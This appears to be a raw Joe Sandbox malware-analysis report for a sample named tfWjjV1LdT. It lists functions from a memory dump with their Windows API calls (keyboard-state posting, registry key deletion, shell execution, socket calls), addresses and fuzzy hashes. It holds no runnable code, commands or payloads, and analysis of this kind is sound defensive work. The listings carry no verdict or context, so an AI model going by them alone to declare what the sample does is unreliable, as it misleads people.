DefDlgProcW.USER32(?,00000005,?,?), ref: 0071D77D

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: d64833fc6d6cc9ba507fddf96f1fdad447ac3e49080d95d4ee3f26795fc3048f
Instruction ID: 118a959a938f1350613ccbdb319a65b34f29101727ce0671cb59e2f48af6104c
Opcode Fuzzy Hash: d64833fc6d6cc9ba507fddf96f1fdad447ac3e49080d95d4ee3f26795fc3048f
Instruction Fuzzy Hash: B9B15775600229EBDF24CF6CC9957E97BB1BF08711F08C169EC489A295D778AD90CFA0

Function 00692A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006CC1C7,00000004,00000000,00000000,00000000), ref: 00692ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,006CC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00692B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,006CC1C7,00000004,00000000,00000000,00000000), ref: 006CC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006CC1C7,00000004,00000000,00000000,00000000), ref: 006CC286

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e9d77d75c9873072b62870ba10d35a7ac9fd0beaa29ef93a8451d2f30bad72c3
Instruction ID: 64cea03d6589147a9d79f8835632bb255dda2bd2807ca58bfcbac44e3029778e
Opcode Fuzzy Hash: e9d77d75c9873072b62870ba10d35a7ac9fd0beaa29ef93a8451d2f30bad72c3
Instruction Fuzzy Hash: 1541DD32604A81BACF358B288CACBFB7B9BEB55314F54C41DE04786EA1C679A946D710

Function 006F70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 006F70DD

Part of subcall function 006B0DB6: std::exception::exception.LIBCMT ref: 006B0DEC
Part of subcall function 006B0DB6: __CxxThrowException@8.LIBCMT ref: 006B0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006F7114
EnterCriticalSection.KERNEL32(?), ref: 006F7130
_memmove.LIBCMT ref: 006F717E
_memmove.LIBCMT ref: 006F719B
LeaveCriticalSection.KERNEL32(?), ref: 006F71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006F71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 006F71DE

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: b73c2b35cd72cd6475e5c288c5b0630eadc6e2240354790ea07967b5d4c27fda
Instruction ID: 1e699d15b1be2f54bd90bf61493c12c4f6c14519dbed44ac802c64fef3002611
Opcode Fuzzy Hash: b73c2b35cd72cd6475e5c288c5b0630eadc6e2240354790ea07967b5d4c27fda
Instruction Fuzzy Hash: A7316E71900205EBDB40DFA8DC85AEFBB79FF45310F1481B9E904AB286DB34DA55CB64

Function 007161D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007161EB
GetDC.USER32(00000000), ref: 007161F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007161FE
ReleaseDC.USER32(00000000,00000000), ref: 0071620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00716246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00716257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0071902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00716291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007162B1

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: b079fcb51907fcef59a38ad07da7752d9072b86691c2f4bf0b1d439ac214aaf6
Instruction ID: 13cb825582aab943a7c8d5d7feb8780a68ce440978492ec67f8e676b6c5310f4
Opcode Fuzzy Hash: b079fcb51907fcef59a38ad07da7752d9072b86691c2f4bf0b1d439ac214aaf6
Instruction Fuzzy Hash: C1314F72101214BFEF118F58DC8AFEA3BA9FF49765F048065FE089A1D1D6799C41CB64

Function 006FEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC

Part of subcall function 006AFC86: _wcscpy.LIBCMT ref: 006AFCA9

_wcstok.LIBCMT ref: 006FEC94
_wcscpy.LIBCMT ref: 006FED23
_memset.LIBCMT ref: 006FED56

Strings

X, xrefs: 006FED93

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 73e550f0331c2dbe56c71697c6ed2ef1a0c010dc647b64cb3fed726e63122da5
Instruction ID: e3c17126926c3aff4f17a979471595ddb40f6cfbdb77c53ca58957974a006fa8
Opcode Fuzzy Hash: 73e550f0331c2dbe56c71697c6ed2ef1a0c010dc647b64cb3fed726e63122da5
Instruction Fuzzy Hash: 77C1B3705083449FCB94EF24C841AAABBE6FF85310F00492DF999877A2DB31EC45CB56

Function 00706B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00706C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00706C21
WSAGetLastError.WSOCK32(00000000), ref: 00706C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00706CEA
inet_ntoa.WSOCK32(?), ref: 00706CA7

Part of subcall function 006EA7E9: _strlen.LIBCMT ref: 006EA7F3
Part of subcall function 006EA7E9: _memmove.LIBCMT ref: 006EA815

_strlen.LIBCMT ref: 00706D44
_memmove.LIBCMT ref: 00706DAD

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 026ddaea038ea30cc8dadb2bbd3f81789ce22d28dd6cef76794f55902e12bd53
Instruction ID: 7f3238ef2da9cf88bb8cc7d71788fa682cfec942517b1ab6e15eaa48253e8af3
Opcode Fuzzy Hash: 026ddaea038ea30cc8dadb2bbd3f81789ce22d28dd6cef76794f55902e12bd53
Instruction Fuzzy Hash: 9281C2B1204300EFDB50EB28CC92E6BB7EAAF84714F104A1DF5559B2D2DA74ED05CBA5

Function 00691424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2682077bb806cb7e71ef99a02f2805f97d2334584a1d8765f42f4b8f66310f5
Instruction ID: f86fa98d22123a133208edec5d7ee49c5106d69a33be231effd553be0b66a08e
Opcode Fuzzy Hash: d2682077bb806cb7e71ef99a02f2805f97d2334584a1d8765f42f4b8f66310f5
Instruction Fuzzy Hash: C2714C7090010AEFCF049F98CC45EFEBBBAFF8A714F248159F915AA251C734AA51CB64

Function 0071B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00D26AD0), ref: 0071B3EB
IsWindowEnabled.USER32(00D26AD0), ref: 0071B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0071B4DB
SendMessageW.USER32(00D26AD0,000000B0,?,?), ref: 0071B512
IsDlgButtonChecked.USER32(?,?), ref: 0071B54F
GetWindowLongW.USER32(00D26AD0,000000EC), ref: 0071B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0071B589

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: e1670364bd8c59ddc82c33017b12c2e5fcac54e1040a9fdcf459fa95c450f1bd
Instruction ID: f706dfdb321bbf4018bb0ac22f1439d8ac029b7612f84cef79c0849d9b2fb956
Opcode Fuzzy Hash: e1670364bd8c59ddc82c33017b12c2e5fcac54e1040a9fdcf459fa95c450f1bd
Instruction Fuzzy Hash: 8B719C38600244EFDB209FA9C894FFA7BB9EF09310F148069ED55972E2C779AD90CB50

Function 0070F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0070F448
_memset.LIBCMT ref: 0070F511
ShellExecuteExW.SHELL32(?), ref: 0070F556

Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC

Part of subcall function 006AFC86: _wcscpy.LIBCMT ref: 006AFCA9

GetProcessId.KERNEL32(00000000), ref: 0070F5CD
CloseHandle.KERNEL32(00000000), ref: 0070F5FC

Strings

@, xrefs: 0070F525

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 700d3a92f87019d79247b1c01264190ca5d48a84243c514e8adb7135029146e5
Instruction ID: 26cb24fd5de850358d5fcf44b5bd5034a2040b0f81d7d5c2bf8e49229de8797f
Opcode Fuzzy Hash: 700d3a92f87019d79247b1c01264190ca5d48a84243c514e8adb7135029146e5
Instruction Fuzzy Hash: 14618B71A00619DFCF14DF68C8819AEBBFAFF49310B10856DE815ABB91DB34AD41CB94

Function 006F0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 006F0F8C
GetKeyboardState.USER32(?), ref: 006F0FA1
SetKeyboardState.USER32(?), ref: 006F1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 006F1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 006F104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 006F1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 006F10B8

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 70c4a29a2f075291bd33db9735724482b3a8b0e6b0eeef1d0e116180a5dafa2d
Instruction ID: 15f0e1deaaea3e8d1190dc4a39936bde332fac40fe5e173c4649a91b85309ce7
Opcode Fuzzy Hash: 70c4a29a2f075291bd33db9735724482b3a8b0e6b0eeef1d0e116180a5dafa2d
Instruction Fuzzy Hash: A05113605047D9BDFB3282348C05BF6BEAB5B07344F08858DE2D58A9C3CA98DCC5D750

Function 006F0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 006F0DA5
GetKeyboardState.USER32(?), ref: 006F0DBA
SetKeyboardState.USER32(?), ref: 006F0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006F0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006F0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006F0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006F0EC9

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9b7023d97f5f1f56f40d211dc7954ddf2b953f56f03394eba0720a143997c112
Instruction ID: a4115f59cd0684b45347835aef03d05bb6f81a84828d1253eb371535368de651
Opcode Fuzzy Hash: 9b7023d97f5f1f56f40d211dc7954ddf2b953f56f03394eba0720a143997c112
Instruction Fuzzy Hash: A451D4A06487D97DFB3283648C55BFABEAA6F06300F088889E2D44A5C3D395EC98D750

Function 006F55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 006F560A
_wcsncpy.LIBCMT ref: 006F563F
_wcsncpy.LIBCMT ref: 006F5671
_wcsncpy.LIBCMT ref: 006F56A4
_wcsncpy.LIBCMT ref: 006F56E6
_wcsncpy.LIBCMT ref: 006F5720
_wcsncpy.LIBCMT ref: 006F574F

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 02995e83a3c178e9bedf599d0cd07ab435b57c5dcacb407ae585322bb1d2101e
Instruction ID: 9e41daa15a6dad246ca17533b602af1282c3003868e06fee2d2538dce3849823
Opcode Fuzzy Hash: 02995e83a3c178e9bedf599d0cd07ab435b57c5dcacb407ae585322bb1d2101e
Instruction Fuzzy Hash: 8D41D8A6C1021876CB51FBB48C469DFB3BA9F04310F50855AE615E3221FB34A685C7EE

Function 006ED56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006ED5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006ED60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006ED61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006ED69D

Strings

DllGetClassObject, xrefs: 006ED610
,,r, xrefs: 006ED578

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,r$DllGetClassObject
API String ID: 753597075-4218317632
Opcode ID: 05f122d309c96627314a07a8181e218d8cfb3125eb8106815fb8e566cd2f461d
Instruction ID: fd375ff123315b053f56117fc5b761604c9fa6253369fbec8dff5659aed0d82e
Opcode Fuzzy Hash: 05f122d309c96627314a07a8181e218d8cfb3125eb8106815fb8e566cd2f461d
Instruction Fuzzy Hash: 4141ACB1602354EFDB04CF25C884A9ABBAAEF44310F1181ADEC099F246D7B5D940CBA4

Function 006F3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006F466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006F3697,?), ref: 006F468B

Part of subcall function 006F466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006F3697,?), ref: 006F46A4

lstrcmpiW.KERNEL32(?,?), ref: 006F36B7
_wcscmp.LIBCMT ref: 006F36D3
MoveFileW.KERNEL32(?,?), ref: 006F36EB
_wcscat.LIBCMT ref: 006F3733
SHFileOperationW.SHELL32(?), ref: 006F379F

Strings

\*.*, xrefs: 006F372D

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: e20576511cdd98ec92ecfc115d43d9d374d97b3bb4d624ca7b49e73b180ee5b4
Instruction ID: 465dd4096af47b5fb489998876169397533c6dde628ce8325127e38a73446231
Opcode Fuzzy Hash: e20576511cdd98ec92ecfc115d43d9d374d97b3bb4d624ca7b49e73b180ee5b4
Instruction Fuzzy Hash: FA4183B1508348AEC792EF64C441AEF77E9AF89340F00092EF599C7351EB34D689C75A

Function 00717291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007172AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00717351
IsMenu.USER32(?), ref: 00717369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007173B1
DrawMenuBar.USER32 ref: 007173C4

Strings

0, xrefs: 0071729E

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: fb6c28a95fd9a89f22af012a204f7b6508fccbb833fa5b5dbf5b8a2866cc16fc
Instruction ID: 8b5f867f2f83343a0dcb86097c07c6dc8fd7eb92aecac0308b9d05d90a717b26
Opcode Fuzzy Hash: fb6c28a95fd9a89f22af012a204f7b6508fccbb833fa5b5dbf5b8a2866cc16fc
Instruction Fuzzy Hash: DA413875A04249EFDB24DF58D884ADABBF9FB08310F14852AFD2597290D738AD90DF60

Function 00710FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00710FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00710FFE
FreeLibrary.KERNEL32(00000000), ref: 007110B5

Part of subcall function 00710FA5: RegCloseKey.ADVAPI32(?), ref: 0071101B
Part of subcall function 00710FA5: FreeLibrary.KERNEL32(?), ref: 0071106D
Part of subcall function 00710FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00711090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00711058

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: e4e32418c5dacfd6dae0c0f67c86b4d76ae2bf80c5688c3dd571504bf4d03ab2
Instruction ID: d392ce0c417e42e9ebdccecc1125ecd1d3e0d12a55ed1679386a03c2baf17401
Opcode Fuzzy Hash: e4e32418c5dacfd6dae0c0f67c86b4d76ae2bf80c5688c3dd571504bf4d03ab2
Instruction Fuzzy Hash: 87310C71D01109FFDB25DB98DC89AFFB7BCEF08300F404169E605A6191EA789EC59AA4

Function 007162CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007162EC
GetWindowLongW.USER32(00D26AD0,000000F0), ref: 0071631F
GetWindowLongW.USER32(00D26AD0,000000F0), ref: 00716354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00716386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007163B0
GetWindowLongW.USER32(00000000,000000F0), ref: 007163C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007163DB

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

